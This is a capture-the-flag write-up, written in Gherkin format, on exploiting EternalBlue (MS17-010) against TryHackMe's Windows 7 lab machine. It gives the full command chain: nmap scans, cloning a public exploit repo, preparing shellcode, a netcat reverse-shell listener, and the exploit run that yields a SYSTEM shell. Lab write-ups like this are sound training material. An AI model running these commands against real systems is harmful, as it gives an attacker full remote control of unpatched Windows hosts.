Feature:
  Site:
    TryHackMe
  Category:
    CTF
  User:
    FearTheKS
  Goal:
    Vulnerate system to get the 3 flags.
  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali Linux      | 2020.2      |
    | nmap            | 7.80        |
    | Python          | 2.7.17      |
    | netcat          | 1.10-41.1+b1|
  Machine Information:
    Given me connected to the TryHackMe VPN
    And the remote machine IP is 10.10.93.244

  Scenario: Success: nmap scan
    Given I wanting to hack that machine
    Then I run a nmap scan like this
    """
    $ nmap -Pn -sC -sV -T5 -p- -oN blue 10.10.93.244
    """
    And the output show me this interesting ports
    """
    ...
    135/tcp  open  msrpc        Microsoft Windows RPC
    139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
    445/tcp  open  microsoft-ds Windows 7 Professional 7601
    ...

    """
  Scenario: Success: Vuln scan for EternalBlue
    Given me thinking about the machine's name and the 445 port open
    Then I lauch an nmap script to check if machine is EternalBlue vulnerable
    """
    $ nmap -Pn --script smb-vuln-ms17-010 -p 445 10.10.93.244
    """
    And it shows the machine is vulnerable
    """
    ...
    Host script results:
    | smb-vuln-ms17-010:
    |   VULNERABLE
    ...

    """
  Scenario: Success: Exploiting EternalBlue
    Given me don't wanting to exploit machine via Metasploit
    Then I found an interesting repo on github and proceed to clone it
    """
    $ git clone https://github.com/3ndG4me/AutoBlue-MS17-010
    """
    Then I proceed to create a shellcode using a tool in that repo
    """
    $ cd AutoBlue-MS17-10/
    $ cd shellcode/
    $ ./shell_prep.sh
    """
    Then I have my shellcode which is a file called "sc_all.bin"
    Then I start a listener with netcat
    """
    $ nc -nlvp 6969
    """
    And Now I proceed to execute python exploit in main folder of repo
    """
    $ python eternalblue_exploit7.py 10.10.93.244 shellcode/sc_all.bin
    """
    Then I receive a connection in my netcat listener
    """
    connect to [10.8.61.94] from (UNKNOWN) [10.10.93.244] 49225
    """
    And I proceed to check which privileges I have
    """
    C:\Windows\system32>whoami
    whoami
    nt authority\system
    """
    Then I see I am the authority
    And I capture the 3 flags, they are in this paths
    """
    C:\flag1.txt
    C:\Windows\System32\config\flag2.txt
    C:\Users\Jon\Documents\flag3.txt
    """
